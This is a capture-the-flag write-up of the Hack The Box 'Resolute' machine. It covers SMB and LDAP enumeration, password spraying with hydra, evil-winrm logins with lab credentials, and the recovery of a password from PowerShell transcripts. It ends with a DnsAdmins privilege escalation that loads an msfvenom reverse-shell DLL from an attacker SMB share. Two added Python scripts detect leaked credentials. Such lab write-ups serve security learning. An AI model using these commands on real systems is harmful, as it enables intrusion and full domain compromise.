shinobi CTF

Working hard at HTB and CTF

Hack The Box Resolute

Resolute

tags: HTB Medium

Procedure

User Flag

  • nmap

      PORT      STATE SERVICE      VERSION
      53/tcp    open  domain       Microsoft DNS
      88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-09 01:19:47Z)
      135/tcp   open  msrpc        Microsoft Windows RPC
      139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
      389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
      445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
      464/tcp   open  kpasswd5?
      593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
      636/tcp   open  tcpwrapped
      3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
      3269/tcp  open  tcpwrapped
      5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
      9389/tcp  open  mc-nmf       .NET Message Framing
      47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
      49664/tcp open  msrpc        Microsoft Windows RPC
      49665/tcp open  msrpc        Microsoft Windows RPC
      49666/tcp open  msrpc        Microsoft Windows RPC
      49667/tcp open  msrpc        Microsoft Windows RPC
      49671/tcp open  msrpc        Microsoft Windows RPC
      49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
      49677/tcp open  msrpc        Microsoft Windows RPC
      49688/tcp open  msrpc        Microsoft Windows RPC
      49709/tcp open  msrpc        Microsoft Windows RPC
      62192/tcp open  tcpwrapped
      63729/tcp open  tcpwrapped
      No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    
      Network Distance: 2 hops
      Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
    

    Looks like a Windows Server running Active Directory.

  • nmap script

      $ sudo nmap -p445 --script smb-enum-shares,smb-enum-users  10.10.10.169 
    
      Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-09 10:38 JST
      PORT    STATE SERVICE
      445/tcp open  microsoft-ds
    
      Host script results:
      | smb-enum-shares: 
      |   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
      |   account_used: <blank>
      |   \\10.10.10.169\ADMIN$: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |     Anonymous access: <none>
      |   \\10.10.10.169\C$: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |     Anonymous access: <none>
      |   \\10.10.10.169\IPC$: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |     Anonymous access: READ
      |   \\10.10.10.169\NETLOGON: 
      |     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
      |_    Anonymous access: <none>
      | smb-enum-users: 
      |   MEGABANK\abigail (RID: 6602)
      |     Flags:       Normal user account
      |   MEGABANK\Administrator (RID: 500)
      |     Description: Built-in account for administering the computer/domain
      |     Flags:       Password does not expire, Normal user account
      |   MEGABANK\angela (RID: 6606)
      |     Flags:       Normal user account
      |   MEGABANK\annette (RID: 6614)
      |     Flags:       Normal user account
      |   MEGABANK\annika (RID: 6615)
      |     Flags:       Normal user account
      |   MEGABANK\claire (RID: 6611)
      |     Flags:       Normal user account
      |   MEGABANK\claude (RID: 6617)
      |     Flags:       Normal user account
      |   MEGABANK\DefaultAccount (RID: 503)
      |     Description: A user account managed by the system.
      |     Flags:       Password not required, Account disabled, Password does not expire, Normal user account
      |   MEGABANK\felicia (RID: 6607)
      |     Flags:       Normal user account
      |   MEGABANK\fred (RID: 6605)
      |     Flags:       Normal user account
      |   MEGABANK\Guest (RID: 501)
      |     Description: Built-in account for guest access to the computer/domain
      |     Flags:       Password not required, Account disabled, Password does not expire, Normal user account
      |   MEGABANK\gustavo (RID: 6608)
      |     Flags:       Normal user account
      |   MEGABANK\krbtgt (RID: 502)
      |     Description: Key Distribution Center Service Account
      |     Flags:       Account disabled, Normal user account
      |   MEGABANK\marcus (RID: 6603)
      |     Flags:       Normal user account
      |   MEGABANK\marko (RID: 1111)
      |     Full name:   Marko Novak
      |     Description: Account created. Password set to Welcome123!
      |     Flags:       Password does not expire, Normal user account
      |   MEGABANK\melanie (RID: 10101)
      |     Flags:       Normal user account
      |   MEGABANK\naoki (RID: 10104)
      |     Flags:       Normal user account
      |   MEGABANK\paulo (RID: 6612)
      |     Flags:       Normal user account
      |   MEGABANK\per (RID: 6616)
      |     Flags:       Normal user account
      |   MEGABANK\ryan (RID: 1105)
      |     Full name:   Ryan Bertrand
      |_    Flags:       Password does not expire, Normal user account
    

    marko's Description field reads "Account created. Password set to Welcome123!", which is highly suspicious.
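    As an added defender-side example (not part of the original writeup), the script below parses the `smb-enum-users` layout shown above and flags accounts whose Description field looks like it contains a credential; the sample text is a constructed excerpt in that layout, and the regexes are my own heuristics.

```python
import re

# Constructed sample in the nmap smb-enum-users layout from the scan above (not the full output).
SAMPLE = """\
| smb-enum-users:
|   MEGABANK\\abigail (RID: 6602)
|     Flags:       Normal user account
|   MEGABANK\\Administrator (RID: 500)
|     Description: Built-in account for administering the computer/domain
|     Flags:       Password does not expire, Normal user account
|   MEGABANK\\marko (RID: 1111)
|     Full name:   Marko Novak
|     Description: Account created. Password set to Welcome123!
|     Flags:       Password does not expire, Normal user account
|_  MEGABANK\\ryan (RID: 1105)
"""

# "|   DOMAIN\user (RID: 1234)" opens an account; "|     Key:   value" lines belong to it.
ACCOUNT_RE = re.compile(r"^\|_?\s+(?P<name>[^\s(]+) \(RID: (?P<rid>\d+)\)")
FIELD_RE = re.compile(r"^\|_?\s+(?P<key>Full name|Description|Flags):\s+(?P<val>.*)$")
# Heuristic phrases that usually mean a password was typed into the description field.
SECRET_HINT_RE = re.compile(r"\b(password|passwd|pwd|pass)\b\s*(set to|is|:|=)", re.I)


def parse_enum_users(text):
    """Turn smb-enum-users output into a list of dicts: name, rid, and any Full name/Description/Flags."""
    accounts = []
    for line in text.splitlines():
        m = ACCOUNT_RE.match(line)
        if m:
            accounts.append({"name": m["name"], "rid": int(m["rid"])})
            continue
        f = FIELD_RE.match(line)
        if f and accounts:
            accounts[-1][f["key"]] = f["val"].strip()
    return accounts


def find_description_leaks(text):
    """Accounts whose Description field appears to carry a credential (audit finding)."""
    return [a for a in parse_enum_users(text) if SECRET_HINT_RE.search(a.get("Description", ""))]


if __name__ == "__main__":
    for acct in find_description_leaks(SAMPLE):
        print(f"{acct['name']} (RID {acct['rid']}): {acct['Description']}")
```

    The same parser runs unchanged on the full nmap output saved to a file, and the description check is the kind of thing worth scheduling against the real directory via LDAP rather than via an SMB scan.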

  • smb login attempt

    Try logging in with smbclient using the credentials marko/Welcome123!.

      $ smbclient -U marko -L  10.10.10.169
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\marko's password: 
      session setup failed: NT_STATUS_LOGON_FAILURE
    

    Doesn't seem to work... Might as well try a dictionary attack against all the users.

      $ hydra -L userlist.txt -p Welcome123! 10.10.10.169 smb
      Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    
      Hydra (http://www.thc.org/thc-hydra) starting at 2020-05-09 10:54:01
      [INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
      [DATA] max 1 task per 1 server, overall 1 task, 27 login tries (l:27/p:1), ~27 tries per task
      [DATA] attacking smb://10.10.10.169:445/
      [445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!
      1 of 1 target successfully completed, 1 valid password found
      Hydra (http://www.thc.org/thc-hydra) finished at 2020-05-09 10:54:19
    

    Got a hit on the melanie account!

    Log in again with smbclient.

      $ smbclient -U melanie -L  10.10.10.169
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\melanie's password: 
    
          Sharename       Type      Comment
          ---------       ----      -------
          ADMIN$          Disk      Remote Admin
          C$              Disk      Default share
          IPC$            IPC       Remote IPC
          NETLOGON        Disk      Logon server share 
          SYSVOL          Disk      Logon server share 
    
      $ smbclient -U melanie  \\\\10.10.10.169\\NETLOGON
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\melanie's password: 
    
      smb: \> ls
      .                                   D        0  Wed Sep 25 22:28:21 2019
      ..                                  D        0  Wed Sep 25 22:28:21 2019
    
              10340607 blocks of size 4096. 7561451 blocks available
    

    Login succeeded! Nothing was found in NETLOGON, so log into SYSVOL.

      $ smbclient -U melanie  \\\\10.10.10.169\\SYSVOL
      WARNING: The "syslog" option is deprecated
      Enter WORKGROUP\melanie's password: 
      Try "help" to get a list of possible commands.
      smb: \> ls
      .                                   D        0  Wed Sep 25 22:28:21 2019
      ..                                  D        0  Wed Sep 25 22:28:21 2019
      megabank.local                      D        0  Wed Sep 25 22:28:21 2019
    

    Downloaded the directory tree under megabank.local, but nothing of note turned up.

      $ tree ./
      ./
      ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
      │   ├── GPT.INI
      │   ├── MACHINE
      │   │   ├── Microsoft
      │   │   │   └── Windows NT
      │   │   │       └── SecEdit
      │   │   │           └── GptTmpl.inf
      │   │   └── Scripts
      │   │       ├── Shutdown
      │   │       └── Startup
      │   └── USER
      ├── {6AC1786C-016F-11D2-945F-00C04fB984F9}
      │   ├── GPT.INI
      │   ├── MACHINE
      │   │   └── Microsoft
      │   │       └── Windows NT
      │   │           └── SecEdit
      │   │               └── GptTmpl.inf
      │   └── USER
      ├── nmap_sV_fullport.txt
      └── userlist.txt
    
  • Try to pull more information from the server with the obtained credentials.
    Use ldapdomaindump.

      $ ldapdomaindump -u MEGABANK\\melanie -p Welcome123! 10.10.10.169
      [*] Connecting to host...
      [*] Binding to host
      [+] Bind OK
      [*] Starting domain dump
      [+] Domain dump finished
    
      $ firefox *.html
    

    It dumps all sorts of information from the LDAP server. melanie is a member of the Remote Management Users group. Remote Management, as the name says, is the feature that lets you manage the server remotely; on Windows Server 2016 and later it is enabled by default. The default port is 5985/tcp.

  • Exploit

    • Access it with a shell tool for Remote Management.

        $ ./evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169
      
        Evil-WinRM shell v2.3
      
        Info: Establishing connection to remote endpoint
      
        *Evil-WinRM* PS C:\Users\melanie\Documents>
        *Evil-WinRM* PS C:\Users\melanie\Desktop> ls
      
      
            Directory: C:\Users\melanie\Desktop
      
      
        Mode                LastWriteTime         Length Name
        ----                -------------         ------ ----
        -ar---        12/3/2019   7:33 AM             32 user.txt
      

      Found the target file, got the flag!!

  • local recon

    Check whether other user directories exist. There seems to be a user called ryan.

     PS C:\Users\melanie\Documents> ls ../../
         Directory: C:\Users
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     d-----        9/25/2019  10:43 AM                Administrator
     d-----        12/4/2019   2:46 AM                melanie
     d-r---       11/20/2016   6:39 PM                Public
     d-----        9/27/2019   7:05 AM                ryan
    

    There is a hidden directory directly under C:\, and under it are transcripts. A transcript is PowerShell's session log written out to a text file. !!Directory walking matters!!

     *Evil-WinRM* PS C:\> dir -hidden
         Directory: C:\
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
     d--hsl        9/25/2019  10:17 AM                Documents and Settings
     d--h--        9/25/2019  10:48 AM                ProgramData
     d--h--        12/3/2019   6:32 AM                PSTranscripts
     d--hs-        9/25/2019  10:17 AM                Recovery
     d--hs-        9/25/2019   6:25 AM                System Volume Information
     -arhs-       11/20/2016   5:59 PM         389408 bootmgr
     -a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
     -a-hs-        5/10/2020   8:35 PM      402653184 pagefile.sys
    
     *Evil-WinRM* PS C:\> cd PSTranscripts
     *Evil-WinRM* PS C:\PSTranscripts> dir -hidden
         Directory: C:\PSTranscripts
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     d--h--        12/3/2019   6:45 AM                20191203
     *Evil-WinRM* PS C:\PSTranscripts> cd 20191203
     *Evil-WinRM* PS C:\PSTranscripts\20191203> dir -hidden
         Directory: C:\PSTranscripts\20191203
     Mode                LastWriteTime         Length Name
     ----                -------------         ------ ----
     -arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
    

    Looking inside, there is a log of ryan mounting the backups directory. The password is passed as a command-line argument.

      >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
    
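    As an added example (not from the original writeup), the scanner below walks PowerShell transcript lines like the one above and reports any `net use` command that carries an inline password, redacting the secret so the finding can be logged safely. The transcript excerpt is constructed: its first command mirrors the line found on the box, the rest are invented to cover the documented `/user:` form and a clean command.

```python
import re

# Constructed transcript excerpt (format of C:\PSTranscripts\...\PowerShell_transcript.*.txt).
TRANSCRIPT = """\
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups ryan Serv3r4Admin4cc123!"
>> ParameterBinding(Invoke-Expression): name="Command"; value="net use Y: \\\\fs01\\share Hunter2Pass /user:MEGABANK\\svc_backup"
>> ParameterBinding(Invoke-Expression): name="Command"; value="Get-ChildItem C:\\Users"
"""

VALUE_RE = re.compile(r'value="(?P<cmd>[^"]*)"?')          # bound command text (closing quote may be cut off)
NET_USE_RE = re.compile(r'\bnet\s+use\b.*?(?P<share>\\\\\S+)\s+(?P<rest>.*)', re.I)
USER_FLAG_RE = re.compile(r'/user:(?P<user>\S+)', re.I)


def credentials_in_command(cmd):
    """Return (user, password) when a `net use` command has an inline password, else None."""
    m = NET_USE_RE.search(cmd)
    if not m:
        return None
    rest = m["rest"].split()
    if not rest:
        return None                      # share only: no credential on the line
    uf = USER_FLAG_RE.search(m["rest"])
    if uf:                               # documented form: net use X: \\srv\share <password> /user:<user>
        pw = [t for t in rest if not t.startswith("/")]
        return (uf["user"], pw[0]) if pw else None
    if len(rest) >= 2:                   # form seen in the transcript: ... <user> <password>
        return (rest[0], rest[1])
    return None


def scan_transcript(text):
    """Return [(line_no, user, redacted_line)] for every command that leaked a password."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        v = VALUE_RE.search(line)
        found = credentials_in_command(v["cmd"]) if v else None
        if found:
            user, pw = found
            hits.append((n, user, line.replace(pw, "<REDACTED>")))
    return hits


if __name__ == "__main__":
    for n, user, redacted in scan_transcript(TRANSCRIPT):
        print(f"line {n}: credential for {user}: {redacted}")
```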

    Logged in with the ryan account.

     $ /opt/evil-winrm/evil-winrm.rb -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169
     Evil-WinRM shell v2.3
     Info: Establishing connection to remote endpoint
    
     *Evil-WinRM* PS C:\Users\ryan\Documents> whoami
     megabank\ryan
    

    ryan is in Contractors and in the DnsAdmins group. Googling 'dnsadmin exploit' turned up a privilege escalation article. Apparently you get the DNS process to load a DLL that calls back a reverse shell. Following the article, build the DLL,

      $ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -f dll > privesc.dll
    

    stand up an SMB server on my own machine,

     $ python3 /opt/impacket/examples/smbserver.py share ./
    

    start a listener,

     $ nc -lvnp 4444
    

    point the server at the DLL and restart dns, and then

     *Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.15.3\share\privesc.dll
    
     Registry property serverlevelplugindll successfully reset.
     Command completed successfully.
    
     *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns
    
     SERVICE_NAME: dns
             TYPE               : 10  WIN32_OWN_PROCESS
             STATE              : 3  STOP_PENDING
                                     (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
             WIN32_EXIT_CODE    : 0  (0x0)
             SERVICE_EXIT_CODE  : 0  (0x0)
             CHECKPOINT         : 0x0
             WAIT_HINT          : 0x0
     *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns
    
     SERVICE_NAME: dns
             TYPE               : 10  WIN32_OWN_PROCESS
             STATE              : 2  START_PENDING
                                     (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
             WIN32_EXIT_CODE    : 0  (0x0)
             SERVICE_EXIT_CODE  : 0  (0x0)
             CHECKPOINT         : 0x0
             WAIT_HINT          : 0x7d0
             PID                : 2444
             FLAGS              :
    

    the reverse shell comes back. Privilege escalation complete. All that's left is to grab the flag.

     $ nc -lnvp 4444
     Listening on [0.0.0.0] (family 0, port 4444)
    
     Connection from 10.10.10.169 56314 received!
     Microsoft Windows [Version 10.0.14393]
     (c) 2016 Microsoft Corporation. All rights reserved.
    
     C:\Windows\system32>whoami
     whoami
     nt authority\system